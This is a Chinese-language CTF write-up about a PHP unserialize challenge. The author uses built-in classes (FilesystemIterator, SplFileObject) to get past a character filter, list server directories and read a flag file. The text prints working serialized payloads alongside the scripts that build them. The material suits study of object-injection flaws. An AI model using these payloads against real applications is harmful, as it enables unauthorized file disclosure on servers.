打开后看到源码
php
<?php
error_reporting(0);
highlight_file(__FILE__);
class A{
public $class;
public $para;
public $check;
public function __construct()
{
$this->class = "B";
$this->para = "ctfer";
echo new $this->class ($this->para);
}
public function __wakeup()
{
$this->check = new C;
if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
echo new $this->class ($this->para);
}
else
die('bad hacker~');
}
}
class B{
var $a;
public function __construct($a)
{
$this->a = $a;
echo ("hello ".$this->a);
}
}
class C{
function vaild($code){
$pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
if (preg_match($pattern, $code)){
return false;
}
else
return true;
}
}
if(isset($_GET['pop'])){
unserialize($_GET['pop']);
}
else{
$a=new A;
} hello ctfer分析源码只看到__wakeup函数,其他类没有什么可以利用的,起点、终点、跳板不管用了。只能用php原生态类来输出文件列表读取文件(而且过滤了一些特殊符号,命令通配符等,包含数字字母\,也只能用路径了),代替命令执行。最终的目的也是读取文件获取内容哦。
FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容,按行读取,跨行需要遍历
DirectoryIterator 遍历目录 直接echo会输出目录下的
读取一下目录/var/www/html
php
<?php
class A{
public $class = 'FilesystemIterator';
public $para = '/var/www/html';
public $check;
}
$a = new A();
echo serialize($a);
?>
O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}输出目录:1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE
继续构造
php
<?php
class A{
public $class = 'FilesystemIterator';
public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE';
public $check;
}
$a = new A();
echo serialize($a);
?>
O:1:"A":3:{s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}显示 flag.php,接下来就要读取内容
php
<?php
class A{
public $class = 'SplFileObject ';
public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
public $check;
}
$a = new A();
echo serialize($a);
?>
O:1:"A":3:{s:5:"class";s:14:"SplFileObject ";s:4:"para";s:56:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php";s:5:"check";N;}输入后得到结果:aced3598a34a561715dacfe32a328c1c